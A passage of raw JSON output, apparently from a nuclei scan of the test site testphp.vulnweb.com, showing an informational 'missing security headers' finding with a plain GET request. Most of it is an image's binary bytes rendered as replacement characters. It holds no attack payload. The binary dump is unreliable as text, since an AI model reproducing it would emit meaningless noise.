Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufffd\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u